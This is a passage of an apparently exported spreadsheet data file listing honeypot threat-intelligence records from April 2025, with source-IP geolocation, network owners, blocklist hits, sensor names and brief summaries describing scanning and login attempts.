    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:57b6:9a5e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1281"/>
    <x v="1281"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T05:10:18"/>
    <d v="2025-04-15T01:33:42"/>
    <d v="2025-04-18T05:10:18"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehrān"/>
    <s v="6659608"/>
    <s v="NA"/>
    <s v="35.7219"/>
    <s v="51.3347"/>
    <s v="60627"/>
    <s v="Rayankadeh Apadana Company Ltd"/>
    <s v="Rayankadeh Apadana Company Ltd"/>
    <s v="business"/>
    <s v="Satia Yaghout2"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b98c:3b12"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1282"/>
    <x v="1282"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T05:01:06"/>
    <d v="2025-04-16T18:09:41"/>
    <d v="2025-04-18T05:01:06"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="49"/>
    <s v="Jeju-do"/>
    <s v="Jeju-si"/>
    <s v="Jeju-si (Ayeon-ro)"/>
    <s v="1846261"/>
    <s v="63142"/>
    <s v="33.4748"/>
    <s v="126.512"/>
    <s v="9946"/>
    <s v="KCTV JEJU BROADCASTING"/>
    <s v="Kctv Jeju Broadcasting"/>
    <s v="residential"/>
    <s v="Cablenet"/>
    <s v="2010-05-31"/>
    <s v="CABLENET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b64:c006"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is conducting a reconnaissance and testing the services, likely to identify vulnerabilities or find open ports. They are trying various combinations of commands and credentials to gain unauthorized access."/>
    <m/>
  </r>
  <r>
    <x v="1283"/>
    <x v="1283"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T04:30:21"/>
    <d v="2025-04-18T04:00:52"/>
    <d v="2025-04-18T04:30:21"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_REDIS_HC1"/>
    <s v="6379"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="CH"/>
    <s v="Switzerland"/>
    <s v="ZH"/>
    <s v="Zurich"/>
    <s v="Bezirk Dietikon"/>
    <s v="Schlieren"/>
    <s v="2658724"/>
    <s v="8952"/>
    <s v="47.3967"/>
    <s v="8.44763"/>
    <s v="9009"/>
    <s v="M247 Europe SRL"/>
    <s v="M247 Europe"/>
    <s v="hosting"/>
    <s v="M247 LTD"/>
    <s v="2019-01-25"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_REDIS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9859:a2e2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to gather information and potentially gain unauthorized access to various systems and services, using reconnaissance techniques such as DNS enumeration, FTP login attempts, HTTP requests for sensitive data, IMAP login attempts, and others. &amp;&amp; The threat actor is attempting to scan and exploit various services on the network, likely for unauthorized access or data extraction purposes. They are using multiple protocols, such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, REDIS, SIP, SMB, SMTP, SNMP, and PostgreSQL, to gather information about the network and identify potential vulnerabilities."/>
    <s v="Scanning for vulnerabilities. &amp;&amp; **Unauthorized Network Scanning**"/>
  </r>
  <r>
    <x v="1284"/>
    <x v="1284"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T03:25:47"/>
    <d v="2025-04-18T03:04:39"/>
    <d v="2025-04-18T03:25:47"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2008-11-04"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71ad:8605"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attackers are performing reconnaissance and scanning activities across multiple services, likely trying to identify vulnerabilities and potential entry points for further exploitation. They are sending probes and test messages to various systems, gathering information about the network configuration and possible targets. &amp;&amp; It appears that an attacker is attempting to gather information about the targeted systems, likely for future exploitation. They are sending various requests to different services, including port scanning and banner grabbing. This activity suggests a reconnaissance phase, where the attacker is trying to map out the network and identify potential vulnerabilities."/>
    <s v="Port Scan/Reconnaissance &amp;&amp;  "/>
  </r>
  <r>
    <x v="1285"/>
    <x v="1285"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T02:16:36"/>
    <d v="2025-04-12T11:50:08"/>
    <d v="2025-04-18T02:16:36"/>
    <n v="32"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_FTP_HC1"/>
    <s v="21"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SA"/>
    <s v="Saudi Arabia"/>
    <s v="01"/>
    <s v="Riyadh Region"/>
    <s v="NA"/>
    <s v="Riyadh"/>
    <s v="108410"/>
    <s v="NA"/>
    <s v="24.7136"/>
    <s v="46.6753"/>
    <s v="25019"/>
    <s v="Saudi Telecom Company JSC"/>
    <s v="Saudi Telecom Company JSC"/>
    <s v="business"/>
    <s v="Saudi Telecom Company JSC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;command"/>
    <s v="{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a895:c4e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The threat actor is attempting to scan and identify services on the network, as evidenced by the repeated attempts to connect to various ports and protocols (DHCP, DNS, FTP, HTTP, etc.). They are also trying to brute-force passwords for certain services (FTP, POP3). Furthermore, they seem to be probing for vulnerabilities in specific systems (e.g., SMB)."/>
    <s v="Vulnerability scanning"/>
  </r>
  <r>
    <x v="1286"/>
    <x v="1286"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T02:13:02"/>
    <d v="2025-04-14T18:54:03"/>
    <d v="2025-04-18T02:13:02"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="33"/>
    <s v="Mersin"/>
    <s v="Silifke"/>
    <s v="Narlıkuyu"/>
    <s v="10632123"/>
    <s v="33940"/>
    <s v="36.4685"/>
    <s v="34.0975"/>
    <s v="44558"/>
    <s v="Netonline Bilisim Sirketi LTD"/>
    <s v="Netonline Bilisim Sirketi LTD"/>
    <s v="business"/>
    <s v="Netonline Bilisim Sirketi LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5db6:4e8a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1287"/>
    <x v="1287"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T02:01:05"/>
    <d v="2025-04-18T02:01:05"/>
    <d v="2025-04-18T02:01:05"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Bang Rak"/>
    <s v="Bang Rak"/>
    <s v="1619278"/>
    <s v="10500"/>
    <s v="13.7262"/>
    <s v="100.528"/>
    <s v="131090"/>
    <s v="CAT-IDC-4bytenet-AS-AP"/>
    <s v="Cat-Bb"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6e4e:8533"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to gather information about the services and systems connected to the honeypot, likely in preparation for a larger-scale attack. They are scanning for open ports and testing various protocols such as FTP, HTTP, HTTPS, IMAP, and others to see which ones are accessible. &amp;&amp; The attacker is attempting to scan and exploit various services on the target network, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. The attacker is using various protocols to gather information about the network, attempt authentication, and potentially gain access to sensitive data."/>
    <s v="Scanning Port &amp;&amp;  "/>
  </r>
  <r>
    <x v="1288"/>
    <x v="1288"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T00:12:10"/>
    <d v="2025-04-14T23:19:54"/>
    <d v="2025-04-18T00:12:10"/>
    <n v="42"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DK"/>
    <s v="Denmark"/>
    <s v="84"/>
    <s v="Capital Region"/>
    <s v="Herlev Kommune"/>
    <s v="Herlev"/>
    <s v="2620431"/>
    <s v="2730"/>
    <s v="55.7237"/>
    <s v="12.44"/>
    <s v="33796"/>
    <s v="Bolignet-Aarhus"/>
    <s v="Bolignet-Aarhus"/>
    <s v="business"/>
    <s v="Bnaa Dhcp"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:54ee:7399"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1289"/>
    <x v="1289"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T23:00:56"/>
    <d v="2025-04-15T03:07:02"/>
    <d v="2025-04-17T23:00:56"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="AR"/>
    <s v="Argentina"/>
    <s v="C"/>
    <s v="Buenos Aires F.D."/>
    <s v="Comuna 15"/>
    <s v="Buenos Aires (Villa Crespo)"/>
    <s v="3435910"/>
    <s v="NA"/>
    <s v="-34.6041"/>
    <s v="-58.4448"/>
    <s v="27747"/>
    <s v="Telecentro S.A."/>
    <s v="Telecentro S.A."/>
    <s v="business"/>
    <s v="Telecentro S.A. - Clientes Residenciales"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:be37:535"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to scan for and exploit various network services, gather information about the system, and potentially gain unauthorized access. The activity suggests a reconnaissance phase, with the attacker probing different ports and protocols in search of vulnerabilities."/>
    <s v="Port scanning is being performed using various protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. The attacker is also attempting to authenticate with various usernames and passwords."/>
  </r>
  <r>
    <x v="1290"/>
    <x v="1290"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T22:13:20"/>
    <d v="2025-04-15T20:37:59"/>
    <d v="2025-04-17T22:13:20"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="KY"/>
    <s v="Kentucky"/>
    <s v="Jefferson"/>
    <s v="Louisville"/>
    <s v="4299276"/>
    <s v="40259"/>
    <s v="38.2527"/>
    <s v="-85.7585"/>
    <s v="7029"/>
    <s v="Windstream Communications LLC"/>
    <s v="Windstream Communications LLC"/>
    <s v="business"/>
    <s v="Windstream Communications LLC"/>
    <s v="None"/>
    <s v="WINDSTREAM"/>
    <s v="2024-09-18"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4b58:555d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1291"/>
    <x v="1291"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T22:10:30"/>
    <d v="2025-04-15T07:50:36"/>
    <d v="2025-04-17T22:10:30"/>
    <n v="32"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MG"/>
    <s v="Minas Gerais"/>
    <s v="Itajubá"/>
    <s v="Itajubá"/>
    <s v="3460834"/>
    <s v="NA"/>
    <s v="-22.4256"/>
    <s v="-45.4528"/>
    <s v="265911"/>
    <s v="G6 Internet"/>
    <s v="G6 Internet"/>
    <s v="business"/>
    <s v="G6 Internet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:83c4:9230"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1292"/>
    <x v="1292"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T21:44:49"/>
    <d v="2024-03-10T23:17:00"/>
    <d v="2025-04-17T21:44:49"/>
    <n v="127"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SNMP_H3&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;31835&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6385"/>
    <s v="77.0997"/>
    <s v="17426"/>
    <s v="Primesoftex Ltd"/>
    <s v="PRIMENET"/>
    <s v="business"/>
    <s v="Primenet Global Ltd."/>
    <s v="2000-06-30"/>
    <s v="PRIMENET-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.196,58319)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.196,58368)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.196,60745)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.196,50809)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.196,50834)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.196,53218)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cb73:60c4"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1293"/>
    <x v="1293"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T20:02:22"/>
    <d v="2025-04-17T20:02:22"/>
    <d v="2025-04-17T20:02:22"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Murshidabad"/>
    <s v="Baharampur (Khagra)"/>
    <s v="1277820"/>
    <s v="742103"/>
    <s v="24.1023"/>
    <s v="88.2561"/>
    <s v="132568"/>
    <s v="INFINET-AS"/>
    <s v="Infinet Communictions"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d78:12b0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to scan the network for open ports and services, potentially identifying vulnerabilities for future exploitation. They are also trying to gather information about the target systems, such as their operating systems, versions, and configurations. &amp;&amp; The attackers are attempting to scan and exploit various network services, including DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. They are also attempting to gain access to sensitive data and systems through phishing attempts, brute-force attacks, and exploitation of vulnerabilities."/>
    <s v=" Port scanning  &amp;&amp;  Credential stuffing attack"/>
  </r>
  <r>
    <x v="1294"/>
    <x v="1294"/>
    <s v="220-135-8-241.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T19:34:29"/>
    <d v="2024-01-09T07:31:00"/>
    <d v="2025-04-17T19:34:29"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="50484&amp;&amp;23"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET: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dc87:8f1"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1295"/>
    <x v="1295"/>
    <s v="cpc92302-cmbg19-2-0-cust790.5-4.cable.virginm.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T19:32:18"/>
    <d v="2025-04-16T04:09:15"/>
    <d v="2025-04-17T19:32:18"/>
    <n v="39"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Cambridgeshire"/>
    <s v="Hauxton"/>
    <s v="2647318"/>
    <s v="NA"/>
    <s v="52.1489"/>
    <s v="0.1018"/>
    <s v="5089"/>
